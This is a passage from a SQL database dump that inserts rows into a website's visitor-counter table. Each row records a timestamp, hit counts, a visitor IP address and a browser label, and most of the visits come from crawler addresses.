2,1525941787,1,1,0,0,'54.36.149.21','other'),(242993,1525941801,1,1,0,0,'54.36.149.5','other'),(242994,1525941802,1,1,0,0,'54.36.148.77','other'),(242995,1525942017,1,1,0,0,'54.36.148.66','other'),(242996,1525942068,1,1,0,0,'87.250.224.46','other'),(242997,1525942208,1,1,0,0,'178.154.171.88','other'),(242998,1525942230,1,1,0,0,'54.36.148.167','other'),(242999,1525942257,1,1,0,0,'54.36.148.192','other'),(243000,1525942327,1,1,0,0,'54.36.149.106','other'),(243001,1525942475,1,1,0,0,'54.36.148.162','other'),(243002,1525942945,1,1,0,0,'62.205.134.182','other'),(243003,1525943050,2,2,0,0,'141.8.142.74','other'),(243004,1525943068,1,1,0,0,'54.36.148.127','other'),(243005,1525943156,1,1,0,0,'54.36.149.52','other'),(243006,1525943157,1,1,0,0,'54.36.149.88','other'),(243007,1525943329,1,1,0,0,'46.175.84.20','chrome'),(243008,1525943677,2,2,0,0,'91.196.178.22','chrome'),(243009,1525943919,1,1,0,0,'54.36.149.86','other'),(243010,1525943983,1,1,0,0,'54.36.148.248','other'),(243011,1525944027,1,1,0,0,'54.36.148.41','other'),(243012,1525944044,1,1,0,0,'54.36.149.56','other'),(243013,1525944052,1,1,0,0,'217.69.133.5','other'),(243014,1525944069,1,1,0,0,'91.196.178.89','chrome'),(243015,1525944214,1,1,0,0,'54.36.148.74','other'),(243017,1525944302,1,1,0,0,'54.36.149.6','other'),(243018,1525944754,1,1,0,0,'8.29.198.27','other'),(243019,1525945216,1,1,0,0,'54.36.148.121','other'),(243020,1525945277,1,1,0,0,'54.36.149.70','other'),(243021,1525945345,1,1,0,0,'141.8.142.74','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (243022,1525945704,1,1,0,0,'54.36.148.35','other'),(243023,1525945791,1,1,0,0,'87.250.224.46','other'),(243024,1525945992,1,1,0,0,'54.36.149.53','other'),(243025,1525946019,1,1,0,0,'54.36.148.170','other'),(243026,1525946187,3,3,0,0,'91.196.178.67','chrome'),(243027,1525946320,1,1,0,0,'141.8.142.74','other'),(243028,1525946551,1,1,0,0,'46.175.84.20','chrome'),(243029,1525946700,1,1,0,0,'54.36.148.27','other'),(243030,1525946819,1,1,0,0,'54.36.148.174','other'),(243031,1525946959,1,1,0,0,'54.36.149.46','other'),(243032,1525947288,1,1,0,0,'54.36.148.187','other'),(243033,1525947330,1,1,0,0,'54.36.149.82','other'),(243034,1525947336,1,1,0,0,'54.36.148.45','other'),(243035,1525947554,1,1,0,0,'54.36.148.241','other'),(243036,1525947575,1,1,0,0,'54.36.148.49','other'),(243037,1525948016,1,1,0,0,'54.36.148.144','other'),(243038,1525948019,1,1,0,0,'54.36.148.89','other'),(243039,1525948199,1,1,0,0,'178.95.213.133','chrome'),(243040,1525948402,1,1,0,0,'54.36.148.152','other'),(243041,1525948473,1,1,0,0,'54.36.149.24','other'),(243042,1525948517,1,1,0,0,'91.210.147.254','chrome'),(243043,1525948708,2,2,0,0,'91.196.178.67','chrome'),(243044,1525948971,1,1,0,0,'91.196.178.133','firefox'),(243045,1525949059,1,1,0,0,'157.55.39.227','other'),(243046,1525949199,1,1,0,0,'54.36.149.57','other'),(243047,1525949381,1,1,0,0,'54.36.148.138','other'),(243048,1525949507,1,1,0,0,'217.69.134.227','other'),(243049,1525949606,1,1,0,0,'54.36.148.106','other'),(243050,1525949646,1,1,0,0,'217.69.133.6','other'),(243051,1525950002,1,1,0,0,'54.36.149.68','other'),(243052,1525950220,1,1,0,0,'8.29.198.25','other'),(243053,1525950258,1,1,0,0,'66.249.66.156','chrome'),(243054,1525950388,1,1,0,0,'176.102.213.29','chrome'),(243055,1525950709,1,1,0,0,'93.78.215.251','chrome'),(243056,1525950713,1,1,0,0,'54.36.148.20','other'),(243057,1525951497,1,1,0,0,'54.36.149.30','other'),(243058,1525951785,1,1,0,0,'54.36.148.109','other'),(243059,1525951809,1,1,0,0,'91.196.121.10','firefox'),(243060,1525951968,1,0,1,0,'66.249.66.155',''),(243061,1525952160,1,1,0,0,'31.43.4.40','chrome'),(243062,1525952271,2,2,0,0,'91.196.178.81','chrome'),(243063,1525952390,1,1,0,0,'54.36.148.135','other'),(243064,1525952656,1,1,0,0,'54.36.149.19','other'),(243065,1525952695,1,1,0,0,'54.36.148.224','other'),(243066,1525952733,1,1,0,0,'31.193.91.80','chrome'),(243067,1525952774,1,1,0,0,'54.36.149.45','other'),(243068,1525952817,1,1,0,0,'54.36.148.230','other'),(243069,1525952974,2,2,0,0,'46.174.163.134','chrome'),(243070,1525953119,1,1,0,0,'54.36.148.78','other'),(243071,1525953519,1,1,0,0,'54.36.148.239','other'),(243072,1525953596,1,1,0,0,'54.36.148.38','other'),(243073,1525953749,1,1,0,0,'91.196.178.161','other'),(243074,1525953932,1,1,0,0,'54.36.148.41','other'),(243075,1525953980,1,1,0,0,'216.244.66.237','other'),(243076,1525954000,1,1,0,0,'87.250.224.46','other'),(243077,1525954408,1,1,0,0,'95.132.14.1','chrome'),(243078,1525954507,1,1,0,0,'176.105.208.30','chrome'),(243079,1525954945,1,1,0,0,'180.76.15.146','other'),(243080,1525954985,1,1,0,0,'54.36.148.144','other'),(243081,1525955142,1,1,0,0,'91.209.11.236','other'),(243082,1525955202,1,1,0,0,'54.36.148.120','other'),(243083,1525955494,1,1,0,0,'178.154.171.88','other'),(243084,1525955596,3,3,0,0,'91.196.178.48','chrome'),(243085,1525955609,1,1,0,0,'8.29.198.26','other'),(243086,1525955667,1,1,0,0,'54.36.148.151','other'),(243087,1525956094,1,1,0,0,'54.36.148.251','other'),(243088,1525956151,1,1,0,0,'54.36.149.17','other'),(243089,1525956160,1,1,0,0,'54.36.149.51','other'),(243090,1525956218,2,2,0,0,'91.196.178.81','chrome'),(243091,1525956375,2,2,0,0,'82.207.121.233','chrome'),(243092,1525956643,1,1,0,0,'62.205.135.147','chrome'),(243093,1525956687,1,1,0,0,'54.36.148.158','other'),(243094,1525956866,1,1,0,0,'54.36.148.95','other'),(243095,1525956894,1,1,0,0,'207.46.13.11','other'),(243096,1525957395,1,1,0,0,'176.124.134.120','chrome'),(243097,1525957444,1,1,0,0,'54.36.149.42','other'),(243098,1525957525,1,1,0,0,'91.196.148.202','firefox'),(243099,1525957781,2,2,0,0,'91.196.178.81','chrome'),(243100,1525958163,1,1,0,0,'188.239.74.231','chrome'),(243101,1525958209,1,1,0,0,'46.175.84.20','chrome'),(243102,1525958990,1,1,0,0,'54.36.148.126','other'),(243103,1525959219,1,1,0,0,'54.36.148.104','other'),(243104,1525959921,1,1,0,0,'178.154.171.88','other'),(243105,1525960033,1,1,0,0,'54.36.148.65','other'),(243106,1525960351,1,1,0,0,'54.36.148.230','other'),(243107,1525960568,1,1,0,0,'46.161.9.39','firefox'),(243108,1525960657,2,2,0,0,'46.174.163.134','chrome'),(243109,1525960741,1,1,0,0,'54.36.148.229','other'),(243110,1525960910,1,1,0,0,'40.77.167.29','other'),(243111,1525960984,1,1,0,0,'54.36.148.221','other'),(243112,1525961062,1,1,0,0,'8.29.198.25','other'),(243113,1525961380,1,1,0,0,'54.36.148.102','other'),(243114,1525961487,1,1,0,0,'95.132.3.112','firefox'),(243115,1525961541,1,1,0,0,'54.36.149.56','other'),(243116,1525961941,1,1,0,0,'141.8.142.74','other'),(243117,1525962047,1,1,0,0,'54.36.149.70','other'),(243118,1525962151,1,1,0,0,'54.36.148.125','other'),(243119,1525962160,1,1,0,0,'54.36.148.80','other'),(243120,1525962233,1,1,0,0,'157.55.39.227','other'),(243121,1525962328,1,1,0,0,'216.244.66.237','other'),(243122,1525962343,1,1,0,0,'37.9.113.115','other'),(243123,1525962644,1,1,0,0,'91.196.178.16','firefox'),(243124,1525962812,1,1,0,0,'54.36.148.95','other'),(243125,1525962985,1,1,0,0,'54.36.148.55','other'),(243126,1525963490,1,1,0,0,'54.36.148.200','other'),(243127,1525963620,1,1,0,0,'178.154.171.88','other'),(243128,1525963671,1,1,0,0,'162.210.196.97','other'),(243129,1525963690,1,1,0,0,'54.36.149.58','other'),(243130,1525963714,1,1,0,0,'54.36.148.41','other'),(243131,1525963723,1,1,0,0,'54.36.148.94','other'),(243132,1525963795,1,1,0,0,'54.36.148.244','other'),(243133,1525963888,1,1,0,0,'54.36.149.12','other'),(243134,1525963989,1,1,0,0,'54.36.148.191','other'),(243135,1525964240,1,1,0,0,'54.36.148.240','other'),(243136,1525964261,1,1,0,0,'54.36.148.63','other'),(243137,1525964297,1,1,0,0,'93.72.131.1','chrome'),(243138,1525964337,1,1,0,0,'54.36.148.120','other'),(243139,1525964401,1,1,0,0,'54.36.149.29','other'),(243140,1525964861,1,1,0,0,'54.36.149.52','other'),(243141,1525965007,1,1,0,0,'54.36.148.85','other'),(243142,1525965145,1,0,1,0,'66.249.66.157',''),(243143,1525965734,1,1,0,0,'54.36.148.154','other'),(243144,1525965915,2,2,0,0,'141.8.142.74','other'),(243145,1525966288,2,2,0,0,'37.73.217.36','chrome'),(243146,1525966465,1,1,0,0,'8.29.198.25','other'),(243147,1525966732,1,1,0,0,'188.230.43.254','other'),(243148,1525966792,1,1,0,0,'54.36.148.63','other'),(243149,1525966982,1,1,0,0,'54.36.148.171','other'),(243150,1525967269,1,1,0,0,'80.252.154.233','chrome'),(243151,1525967502,1,1,0,0,'194.187.170.140','other'),(243152,1525967515,1,1,0,0,'54.36.148.84','other'),(243153,1525967615,1,1,0,0,'54.36.149.87','other'),(243154,1525967837,1,1,0,0,'54.36.149.17','other'),(243155,1525967963,1,1,0,0,'54.36.148.119','other'),(243156,1525968036,1,1,0,0,'54.36.148.35','other'),(243157,1525968092,1,1,0,0,'54.36.148.126','other'),(243158,1525968156,1,1,0,0,'141.8.142.74','other'),(243159,1525968772,1,1,0,0,'188.230.43.254','other'),(243160,1525968988,1,1,0,0,'54.36.148.181','other'),(243161,1525969038,1,1,0,0,'93.76.221.51','chrome'),(243162,1525969167,1,1,0,0,'54.36.148.48','other'),(243163,1525969242,1,1,0,0,'54.36.149.99','other'),(243164,1525969779,1,1,0,0,'54.36.148.173','other'),(243165,1525970110,2,2,0,0,'141.8.142.74','other'),(243166,1525970329,1,1,0,0,'54.36.148.118','other'),(243167,1525970617,1,1,0,0,'54.36.148.80','other'),(243168,1525970961,1,1,0,0,'193.194.127.222','firefox'),(243169,1525971034,1,1,0,0,'54.36.148.18','other'),(243170,1525971183,1,1,0,0,'188.230.43.254','other'),(243171,1525971252,1,1,0,0,'217.69.134.161','other'),(243172,1525971351,1,1,0,0,'54.36.148.23','other'),(243173,1525971463,1,1,0,0,'54.36.148.145','other'),(243174,1525971502,1,1,0,0,'54.36.148.81','other'),(243175,1525971609,1,1,0,0,'54.36.148.123','other'),(243176,1525971911,1,1,0,0,'8.29.198.25','other'),(243177,1525972038,1,1,0,0,'217.69.133.5','other'),(243178,1525972059,1,1,0,0,'54.36.148.49','other'),(243179,1525972755,1,1,0,0,'193.106.30.99','firefox'),(243180,1525972821,1,1,0,0,'217.69.133.2','other'),(243181,1525972851,1,1,0,0,'216.244.66.237','other'),(243182,1525972952,1,1,0,0,'54.36.148.73','other'),(243183,1525973336,1,1,0,0,'54.36.148.224','other'),(243184,1525973409,1,1,0,0,'217.69.134.220','other'),(243185,1525973577,1,1,0,0,'188.230.43.254','other'),(243186,1525973656,1,1,0,0,'54.36.148.40','other'),(243187,1525973825,1,1,0,0,'217.69.134.183','other'),(243188,1525974142,1,1,0,0,'217.69.134.185','other'),(243189,1525974436,2,2,0,0,'217.69.134.174','other'),(243190,1525974474,1,1,0,0,'54.36.148.30','other'),(243191,1525974563,1,1,0,0,'54.36.148.196','other'),(243192,1525974679,1,1,0,0,'54.36.149.84','other'),(243193,1525974680,1,1,0,0,'217.69.134.160','other'),(243194,1525974883,1,1,0,0,'54.36.148.84','other'),(243195,1525975004,2,2,0,0,'91.196.178.163','chrome'),(243196,1525975070,1,1,0,0,'217.69.133.5','other'),(243197,1525975077,1,1,0,0,'54.36.148.149','other'),(243198,1525975327,1,1,0,0,'54.36.149.5','other'),(243199,1525975363,1,1,0,0,'217.69.134.182','other'),(243200,1525975376,1,1,0,0,'54.36.148.55','other'),(243201,1525975392,1,1,0,0,'54.36.149.91','other'),(243202,1525975483,1,1,0,0,'217.69.133.6','other'),(243203,1525975509,1,1,0,0,'54.36.148.10','other'),(243204,1525975728,1,1,0,0,'217.69.133.4','other'),(243205,1525975831,1,1,0,0,'217.69.134.161','other'),(243206,1525975932,5,5,0,0,'176.36.71.190','chrome'),(243207,1525975936,1,1,0,0,'217.69.134.227','other'),(243208,1525976029,1,1,0,0,'217.69.134.154','other'),(243209,1525976064,1,1,0,0,'54.36.148.146','other'),(243210,1525976117,1,1,0,0,'54.36.149.4','other'),(243211,1525976136,1,1,0,0,'217.69.134.185','other'),(243212,1525976235,1,1,0,0,'54.36.149.102','other'),(243213,1525976252,1,1,0,0,'54.36.149.87','other'),(243214,1525976255,1,1,0,0,'217.69.134.160','other'),(243215,1525976359,1,1,0,0,'217.69.134.176','other'),(243216,1525976561,1,1,0,0,'54.36.148.229','other'),(243217,1525976826,1,1,0,0,'54.36.148.58','other'),(243218,1525977008,1,0,1,0,'66.249.66.76',''),(243219,1525977088,1,1,0,0,'54.36.148.87','other'),(243220,1525977289,1,1,0,0,'54.36.149.10','other'),(243221,1525977308,1,1,0,0,'8.29.198.27','other'),(243222,1525977450,1,1,0,0,'54.36.148.178','other'),(243223,1525977532,1,1,0,0,'54.36.148.82','other'),(243224,1525977665,1,1,0,0,'54.36.148.183','other'),(243225,1525977817,1,0,1,0,'66.249.66.75',''),(243226,1525977830,1,1,0,0,'66.249.66.75','chrome'),(243227,1525977835,1,1,0,0,'66.249.66.157','chrome'),(243228,1525977978,1,1,0,0,'54.36.149.41','other'),(243229,1525978151,1,1,0,0,'54.36.148.11','other'),(243230,1525978286,1,0,1,0,'66.249.66.156',''),(243231,1525978406,1,1,0,0,'54.36.148.65','other'),(243232,1525978665,1,1,0,0,'54.36.149.38','other'),(243233,1525978667,1,1,0,0,'54.36.148.189','other'),(243234,1525978926,1,1,0,0,'110.83.60.135','other'),(243235,1525979381,1,1,0,0,'54.36.148.40','other'),(243236,1525979487,1,1,0,0,'54.236.8.204','other'),(243237,1525979718,1,1,0,0,'40.77.167.29','other'),(243238,1525980292,1,1,0,0,'91.196.178.91','firefox'),(243239,1525980350,1,1,0,0,'54.36.149.46','other'),(243240,1525980411,1,0,1,0,'66.249.66.155',''),(243241,1525980431,1,1,0,0,'54.236.8.204','other'),(243242,1525980504,1,0,1,0,'66.249.66.156',''),(243243,1525980515,1,1,0,0,'176.36.191.167','chrome'),(243244,1525980539,1,1,0,0,'54.36.148.232','other'),(243245,1525980804,1,1,0,0,'54.36.148.244','other'),(243246,1525980817,1,1,0,0,'54.36.148.84','other'),(243247,1525980855,1,1,0,0,'141.8.142.74','other'),(243248,1525980867,1,1,0,0,'40.77.167.29','other'),(243249,1525981085,1,1,0,0,'54.36.149.50','other'),(243250,1525981171,1,0,1,0,'66.249.66.157',''),(243251,1525981366,1,1,0,0,'54.236.8.204','other'),(243252,1525981396,1,1,0,0,'37.73.207.205','chrome'),(243253,1525981429,1,1,0,0,'54.36.148.13','other'),(243254,1525981496,1,1,0,0,'54.36.149.79','other'),(243255,1525981605,1,1,0,0,'54.36.149.53','other'),(243256,1525981616,1,1,0,0,'107.21.1.8','other'),(243257,1525981620,1,1,0,0,'54.36.148.198','other'),(243258,1525981957,1,1,0,0,'54.36.149.80','other'),(243259,1525982031,1,1,0,0,'54.36.148.205','other'),(243260,1525982225,1,1,0,0,'54.36.148.110','other'),(243261,1525982273,1,1,0,0,'207.46.13.11','other'),(243262,1525982298,1,1,0,0,'54.236.8.204','other'),(243263,1525982336,1,0,1,0,'66.249.66.157',''),(243264,1525982468,1,1,0,0,'54.36.148.31','other'),(243265,1525982507,1,1,0,0,'54.36.148.119','other'),(243266,1525982703,1,1,0,0,'87.250.224.46','other'),(243267,1525982724,1,1,0,0,'54.36.148.143','other'),(243268,1525982744,1,1,0,0,'8.29.198.26','other'),(243269,1525982919,1,1,0,0,'54.36.148.50','other'),(243270,1525983005,1,1,0,0,'54.36.148.153','other'),(243271,1525983181,1,1,0,0,'54.36.149.100','other'),(243272,1525983229,1,1,0,0,'54.236.8.204','other'),(243273,1525983488,1,1,0,0,'54.36.148.115','other'),(243274,1525983614,1,1,0,0,'54.36.148.195','other'),(243275,1525984159,1,1,0,0,'54.236.8.204','other'),(243276,1525984176,1,0,1,0,'66.249.64.29',''),(243277,1525984612,1,1,0,0,'54.36.148.215','other'),(243278,1525984815,1,1,0,0,'54.36.149.51','other'),(243279,1525984896,1,1,0,0,'54.36.149.72','other'),(243280,1525985059,1,1,0,0,'54.36.148.178','other'),(243281,1525985061,1,1,0,0,'54.236.8.204','other'),(243282,1525985459,1,1,0,0,'54.36.148.48','other'),(243283,1525985508,1,1,0,0,'54.36.148.22','other'),(243284,1525985609,1,1,0,0,'178.154.171.88','other'),(243285,1525985623,1,1,0,0,'54.36.149.46','other'),(243286,1525985910,1,1,0,0,'54.36.148.246','other'),(243287,1525985964,1,1,0,0,'54.236.8.204','other'),(243288,1525986058,1,1,0,0,'54.36.148.170','other'),(243289,1525986208,1,1,0,0,'54.36.148.251','other'),(243290,1525986233,2,2,0,0,'141.8.142.74','other'),(243291,1525986812,1,1,0,0,'54.36.149.48','other'),(243292,1525986890,1,1,0,0,'54.236.8.204','other'),(243293,1525987133,1,1,0,0,'54.36.148.120','other'),(243294,1525987274,2,2,0,0,'141.8.142.74','other'),(243295,1525987504,1,0,1,0,'66.249.70.25',''),(243296,1525987535,1,1,0,0,'54.36.148.110','other'),(243297,1525987668,1,1,0,0,'54.36.148.60','other'),(243298,1525987714,1,1,0,0,'157.55.39.227','other'),(243299,1525987791,1,1,0,0,'54.236.8.204','other'),(243300,1525987821,1,1,0,0,'54.36.148.216','other'),(243301,1525987889,1,1,0,0,'207.46.13.11','other'),(243302,1525988144,1,1,0,0,'8.29.198.25','other'),(243303,1525988691,1,1,0,0,'54.36.148.29','other'),(243304,1525988717,1,1,0,0,'54.236.8.204','other'),(243305,1525988806,1,1,0,0,'54.36.148.176','other'),(243306,1525988832,1,1,0,0,'54.36.148.234','other'),(243307,1525988836,1,1,0,0,'54.36.148.253','other'),(243308,1525989621,1,1,0,0,'54.236.8.204','other'),(243309,1525989639,1,1,0,0,'54.36.148.182','other'),(243310,1525989669,1,1,0,0,'185.105.89.38','chrome'),(243311,1525989767,1,1,0,0,'54.36.148.216','other'),(243312,1525989980,1,1,0,0,'54.36.148.244','other'),(243313,1525990091,1,1,0,0,'46.161.9.39','firefox'),(243314,1525990529,1,1,0,0,'54.36.148.212','other'),(243315,1525990539,1,0,1,0,'66.249.64.28',''),(243316,1525990552,1,1,0,0,'54.236.8.204','other'),(243317,1525990946,1,1,0,0,'54.36.148.200','other'),(243318,1525990988,1,1,0,0,'157.55.39.227','other'),(243319,1525991183,1,1,0,0,'54.36.148.232','other'),(243320,1525991478,2,2,0,0,'54.236.8.204','other'),(243321,1525991553,1,1,0,0,'54.36.148.165','other'),(243322,1525991663,1,1,0,0,'54.36.148.224','other'),(243323,1525991815,1,1,0,0,'54.36.148.52','other'),(243324,1525992014,1,0,1,0,'66.249.64.30',''),(243325,1525992080,1,1,0,0,'54.36.148.25','other'),(243326,1525992152,1,1,0,0,'141.8.142.74','other'),(243327,1525992227,1,0,1,0,'66.249.64.28',''),(243328,1525992380,1,1,0,0,'54.236.8.204','other'),(243329,1525992398,1,1,0,0,'54.36.148.186','other'),(243330,1525992906,1,1,0,0,'54.36.148.105','other'),(243331,1525993088,1,1,0,0,'40.77.167.29','other'),(243332,1525993282,1,1,0,0,'54.236.8.204','other'),(243333,1525993307,1,1,0,0,'54.36.148.167','other'),(243334,1525993372,1,1,0,0,'54.152.144.176','other'),(243335,1525993580,1,1,0,0,'8.29.198.25','other'),(243336,1525993728,1,1,0,0,'54.36.149.82','other'),(243337,1525993777,1,1,0,0,'54.36.148.81','other'),(243338,1525994141,1,1,0,0,'54.36.149.12','other'),(243339,1525994183,1,1,0,0,'54.236.8.204','other'),(243340,1525994282,1,1,0,0,'54.36.149.46','other'),(243341,1525994584,1,1,0,0,'54.36.148.84','other'),(243342,1525994813,1,1,0,0,'54.36.148.43','other'),(243343,1525994866,1,1,0,0,'54.36.148.178','other'),(243344,1525994886,1,1,0,0,'54.36.148.128','other'),(243345,1525995000,1,1,0,0,'54.36.148.129','other'),(243346,1525995077,1,1,0,0,'54.36.149.52','other'),(243347,1525995105,1,1,0,0,'54.36.149.4','other'),(243348,1525995113,1,1,0,0,'54.236.8.204','other'),(243349,1525995222,1,1,0,0,'54.36.148.52','other'),(243350,1525995437,1,1,0,0,'40.77.167.29','other'),(243351,1525995780,1,1,0,0,'54.36.149.58','other'),(243352,1525995855,1,1,0,0,'54.36.148.169','other'),(243353,1525995864,2,2,0,0,'207.46.13.11','other'),(243354,1525995874,1,1,0,0,'54.36.148.232','other'),(243355,1525996006,1,1,0,0,'54.36.148.135','other'),(243356,1525996017,1,1,0,0,'54.236.8.204','other'),(243357,1525996116,1,1,0,0,'54.36.148.172','other'),(243358,1525996606,1,1,0,0,'54.36.149.2','other'),(243359,1525996788,1,1,0,0,'54.36.149.28','other'),(243360,1525996918,1,1,0,0,'54.236.8.204','other'),(243361,1525996993,1,1,0,0,'54.36.148.71','other'),(243362,1525997179,1,1,0,0,'54.36.148.50','other'),(243363,1525997431,1,1,0,0,'37.9.113.182','other'),(243364,1525997451,1,1,0,0,'37.9.113.115','other'),(243365,1525997554,1,1,0,0,'54.36.149.16','other'),(243366,1525997570,1,1,0,0,'141.8.142.74','other'),(243367,1525997584,1,1,0,0,'54.36.149.2','other'),(243368,1525997625,1,1,0,0,'54.36.149.105','other'),(243369,1525997757,1,1,0,0,'54.36.148.79','other'),(243370,1525997774,1,1,0,0,'54.36.148.114','other'),(243371,1525997845,1,1,0,0,'54.236.8.204','other'),(243372,1525997990,1,1,0,0,'54.36.148.72','other'),(243373,1525998255,1,1,0,0,'54.36.149.62','other'),(243374,1525998341,1,1,0,0,'54.36.148.130','other'),(243375,1525998377,1,1,0,0,'54.36.149.97','other'),(243376,1525998379,1,1,0,0,'193.106.30.99','firefox'),(243377,1525998500,1,1,0,0,'216.244.66.237','other'),(243378,1525998707,1,1,0,0,'54.36.148.167','other'),(243379,1525998740,1,1,0,0,'54.36.148.241','other'),(243380,1525998763,1,1,0,0,'54.236.8.204','other'),(243381,1525998822,1,1,0,0,'54.36.149.65','other'),(243382,1525998985,1,1,0,0,'8.29.198.26','other'),(243383,1525999040,1,1,0,0,'54.36.149.5','other'),(243384,1525999204,1,1,0,0,'54.36.148.140','other'),(243385,1525999585,1,1,0,0,'141.8.142.74','other'),(243386,1525999666,1,1,0,0,'54.236.8.204','other'),(243387,1525999693,1,1,0,0,'54.36.148.226','other'),(243388,1525999858,1,1,0,0,'54.36.148.133','other'),(243389,1526000138,1,1,0,0,'54.36.148.59','other'),(243390,1526000182,1,1,0,0,'54.36.149.89','other'),(243391,1526000504,1,1,0,0,'54.36.148.104','other'),(243392,1526000564,1,1,0,0,'54.36.148.125','other'),(243393,1526000569,1,1,0,0,'54.236.8.204','other'),(243394,1526000972,1,1,0,0,'54.36.148.139','other'),(243395,1526001038,1,1,0,0,'54.36.148.145','other'),(243396,1526001194,1,1,0,0,'54.36.148.63','other'),(243397,1526001232,1,1,0,0,'54.36.148.248','other'),(243398,1526001389,1,1,0,0,'54.36.149.17','other'),(243399,1526001394,1,1,0,0,'54.36.148.175','other'),(243400,1526001477,1,1,0,0,'54.236.8.204','other'),(243401,1526001553,1,1,0,0,'54.36.148.66','other'),(243402,1526001651,22,22,0,0,'167.114.219.41','other'),(243403,1526001819,1,1,0,0,'54.36.148.142','other'),(243404,1526002221,1,1,0,0,'54.36.149.27','other'),(243405,1526002244,1,1,0,0,'54.36.148.127','other'),(243406,1526002276,1,1,0,0,'54.36.149.12','other'),(243407,1526002409,1,1,0,0,'54.236.8.204','other'),(243408,1526002809,1,1,0,0,'54.36.148.233','other'),(243409,1526003247,1,1,0,0,'54.36.148.28','other'),(243410,1526003315,1,1,0,0,'54.36.148.123','other'),(243411,1526003340,1,1,0,0,'54.236.8.204','other'),(243412,1526003477,1,1,0,0,'54.36.149.36','other'),(243413,1526003696,1,1,0,0,'54.36.148.234','other'),(243414,1526003878,1,1,0,0,'54.36.149.60','other'),(243415,1526003887,1,1,0,0,'54.36.149.12','other'),(243416,1526004049,1,1,0,0,'54.36.148.174','other'),(243417,1526004093,1,1,0,0,'54.36.148.205','other'),(243418,1526004111,1,1,0,0,'54.36.148.204','other'),(243419,1526004113,1,1,0,0,'54.36.148.84','other'),(243420,1526004131,1,1,0,0,'54.36.148.228','other'),(243421,1526004201,1,1,0,0,'54.36.148.126','other'),(243422,1526004241,1,1,0,0,'54.236.8.204','other'),(243423,1526004411,1,1,0,0,'8.29.198.25','other'),(243424,1526004540,1,1,0,0,'54.36.148.225','other'),(243425,1526004550,1,1,0,0,'54.36.148.200','other'),(243426,1526004591,1,1,0,0,'54.36.148.72','other'),(243427,1526004649,1,1,0,0,'54.36.148.254','other'),(243428,1526004658,1,1,0,0,'54.36.148.122','other'),(243429,1526005166,1,1,0,0,'54.236.8.204','other'),(243430,1526005328,1,1,0,0,'54.36.148.238','other'),(243431,1526005477,1,1,0,0,'54.36.148.184','other'),(243432,1526005571,1,1,0,0,'54.36.148.62','other'),(243433,1526006067,1,1,0,0,'54.236.8.204','other'),(243434,1526006517,1,1,0,0,'54.36.149.47','other'),(243435,1526006569,1,1,0,0,'54.36.149.105','other'),(243436,1526006970,1,1,0,0,'54.236.8.204','other'),(243437,1526007292,1,1,0,0,'54.36.148.146','other'),(243438,1526007511,1,1,0,0,'54.36.149.22','other'),(243439,1526007707,1,1,0,0,'54.36.149.38','other'),(243440,1526007744,1,1,0,0,'54.36.148.14','other'),(243441,1526007800,1,1,0,0,'54.36.148.123','other'),(243442,1526007889,1,1,0,0,'54.236.8.204','other'),(243443,1526007962,1,1,0,0,'54.36.149.28','other'),(243444,1526007973,1,1,0,0,'157.55.39.253','other'),(243445,1526008222,1,1,0,0,'54.36.148.127','other'),(243446,1526008455,1,1,0,0,'54.36.149.82','other'),(243447,1526008574,1,1,0,0,'54.36.148.133','other'),(243448,1526008814,1,1,0,0,'54.236.8.204','other'),(243449,1526008918,1,1,0,0,'54.36.148.238','other'),(243450,1526009012,1,1,0,0,'54.36.149.18','other'),(243451,1526009058,1,1,0,0,'54.36.149.103','other'),(243452,1526009332,1,1,0,0,'54.36.148.139','other'),(243453,1526009340,1,1,0,0,'54.36.148.145','other'),(243454,1526009399,1,1,0,0,'178.154.171.88','other'),(243455,1526009470,1,1,0,0,'54.36.149.33','other'),(243456,1526009595,1,1,0,0,'54.36.148.37','other'),(243457,1526009720,1,1,0,0,'54.236.8.204','other'),(243458,1526009823,1,1,0,0,'8.29.198.26','other'),(243459,1526009912,1,1,0,0,'54.36.148.175','other'),(243460,1526010176,1,1,0,0,'54.36.148.99','other'),(243461,1526010206,1,1,0,0,'54.36.149.91','other'),(243462,1526010419,1,1,0,0,'54.36.148.187','other'),(243463,1526010623,1,1,0,0,'54.236.8.204','other'),(243464,1526010704,1,1,0,0,'54.36.148.179','other'),(243465,1526010850,1,1,0,0,'54.36.148.15','other'),(243466,1526011181,1,1,0,0,'54.36.149.78','other'),(243467,1526011538,1,1,0,0,'54.236.8.204','other'),(243468,1526011747,1,1,0,0,'54.36.148.28','other'),(243469,1526011948,1,1,0,0,'54.36.149.97','other'),(243470,1526012060,1,1,0,0,'141.8.142.74','other'),(243471,1526012197,1,1,0,0,'54.36.148.133','other'),(243472,1526012227,1,1,0,0,'54.36.149.14','other'),(243473,1526012371,1,1,0,0,'54.36.148.47','other'),(243474,1526012441,1,1,0,0,'54.236.8.204','other'),(243475,1526012475,1,1,0,0,'54.36.148.203','other'),(243476,1526012652,1,1,0,0,'54.36.148.115','other'),(243477,1526012898,1,1,0,0,'54.36.149.93','other'),(243478,1526012960,1,1,0,0,'54.36.148.11','other'),(243479,1526012985,1,1,0,0,'54.36.149.61','other'),(243480,1526013109,1,0,1,0,'66.249.64.29',''),(243481,1526013198,1,1,0,0,'54.36.148.99','other'),(243482,1526013356,1,1,0,0,'54.236.8.204','other'),(243483,1526013917,1,1,0,0,'54.36.148.89','other'),(243484,1526013987,42,42,0,0,'144.76.108.21','other'),(243485,1526014283,1,1,0,0,'54.236.8.204','other'),(243486,1526014361,1,1,0,0,'54.36.149.12','other'),(243487,1526014913,1,1,0,0,'54.36.148.175','other'),(243488,1526015187,1,1,0,0,'54.236.8.204','other'),(243489,1526015246,1,1,0,0,'8.29.198.26','other'),(243490,1526015276,1,1,0,0,'54.36.148.202','other'),(243491,1526015671,1,1,0,0,'54.36.148.105','other'),(243492,1526015692,1,1,0,0,'54.36.148.43','other'),(243493,1526015742,1,1,0,0,'157.55.39.253','other'),(243494,1526015788,1,1,0,0,'54.36.148.129','other'),(243495,1526015859,1,1,0,0,'54.36.149.83','other'),(243496,1526015951,1,1,0,0,'54.36.149.93','other'),(243497,1526016003,1,1,0,0,'91.225.111.207','chrome'),(243498,1526016049,1,0,1,0,'66.249.64.28',''),(243499,1526016102,1,1,0,0,'54.236.8.204','other'),(243500,1526016260,1,1,0,0,'95.135.53.50','chrome'),(243501,1526016292,1,1,0,0,'37.55.150.47','chrome'),(243502,1526016468,1,1,0,0,'54.36.148.15','other'),(243503,1526017031,1,1,0,0,'54.236.8.204','other'),(243504,1526017131,1,1,0,0,'91.196.178.89','chrome'),(243505,1526017492,1,1,0,0,'54.36.148.177','other'),(243506,1526017956,